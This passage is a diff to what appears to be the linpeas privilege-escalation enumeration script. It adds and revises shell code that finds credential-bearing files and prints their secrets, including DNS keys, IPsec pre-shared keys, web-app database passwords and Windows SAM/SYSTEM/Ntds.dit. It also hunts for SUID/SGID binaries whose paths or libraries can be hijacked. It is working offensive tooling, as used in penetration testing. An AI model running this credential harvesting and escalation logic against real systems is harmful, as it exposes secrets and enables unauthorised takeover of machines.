\"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + print_2title "Analyzing Racoon Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analizing SeedDMS Files (limit 70)" + print_2title "Analyzing Opera Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then echo_not_found "com.operasoftware.Opera"; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Safari Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then echo_not_found "Safari"; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analyzing Bind Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing SeedDMS Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analizing Ddclient Files (limit 70)" + print_2title "Analyzing Ddclient Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; + print_2title "Analyzing Sentry Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then echo_not_found "sentry"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; for ff in $(find "$f" -name "config.yml"); do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then echo_not_found "sentry.conf.py"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - print_2title "Analizing Interesting logs Files (limit 70)" + print_2title "Analyzing Strapi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then echo_not_found "environments"; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; for ff in $(find "$f" -name "custom.json"); do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "database.json"); do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "request.json"); do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "response.json"); do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "security.json"); do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "server.json"); do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Cacti Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then echo_not_found "cacti"; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; for ff in $(find "$f" -name "config.php"); do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "config.php.dist"); do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "installer.php"); do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "check_all_pages"); do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Roundcube Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then echo_not_found "roundcube"; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; for ff in $(find "$f" -name "config.inc.php"); do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analyzing Passbolt Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + + + + + print_2title "Analyzing Interesting logs Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - print_2title "Analizing Windows Files Files (limit 70)" + print_2title "Analyzing Windows Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; @@ -2646,6 +3042,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then echo_not_found "protecteduserkey.bin"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; @@ -2669,10 +3066,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security$\"`" ]; then echo_not_found "security"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security$" | while read f; do ls -ld "$f" | sed -${E} "s,security$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"services\.xml$\"`" ]; then echo_not_found "services.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "services\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,services\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; @@ -2686,12 +3081,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - print_2title "Analizing Other Interesting Files Files (limit 70)" + print_2title "Analyzing Other Interesting Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; @@ -2709,7 +3105,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi -if [ "`echo $CHECKS | grep IntFiles`" ]; then +if echo $CHECKS | grep -q IntFiles; then ########################################### #----------) Interesting files (----------# ########################################### @@ -2724,11 +3120,12 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then if ! [ "$STRACE" ]; then echo_not_found "strace" fi - find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null | while read s; do + s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if [ "`echo \"$s\" | grep -E \"^total\"`" ]; then break; fi + if echo "$s" | grep -qE "^total"; then break; fi - sname="`echo \"$s\" | awk '{print $9}'`" + sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then @@ -2738,28 +3135,28 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then else c="a" for b in $sidB; do - if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then + if echo $s | grep -q $(echo $b | cut -d % -f 1); then echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then + if echo \"$s\" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="`echo \"$sline\" | cut -d ' ' -f1`" - if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then - if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi else #If not a path - if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ] && [ "`echo \"$sline_first\" | grep -v \"..\" `" ]; then #Check if existing binary + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi fi @@ -2769,8 +3166,11 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $ITALIC echo "----------------------------------------------------------------------------------------" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH echo "----------------------------------------------------------------------------------------" echo "" fi @@ -2785,52 +3185,53 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) SGID print_2title "SGID" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null | while read s; do + s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if [ "`echo \"$s\" | grep -E \"^total\"`" ];then break; fi + if echo "$s" | grep -qE "^total";then break; fi - sname="`echo \"$s\" | awk '{print $9}'`" + sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] &6 [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do - if [ "`echo \"$s\" | grep $(echo \"$b\" | cut -d % -f 1)`" ]; then - echo "$s" | sed -${E} "s,$(echo \"$b\" | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="`echo \"$sline\" | cut -d ' ' -f1`" - if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then - if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" fi else #If not a path - if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ]; then #Check if existing binary + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" fi fi fi done if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf $ITALIC + printf "$ITALIC" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC + printf "$NC" echo "" fi fi @@ -2846,10 +3247,10 @@ if [ "`echo $CHECKS | 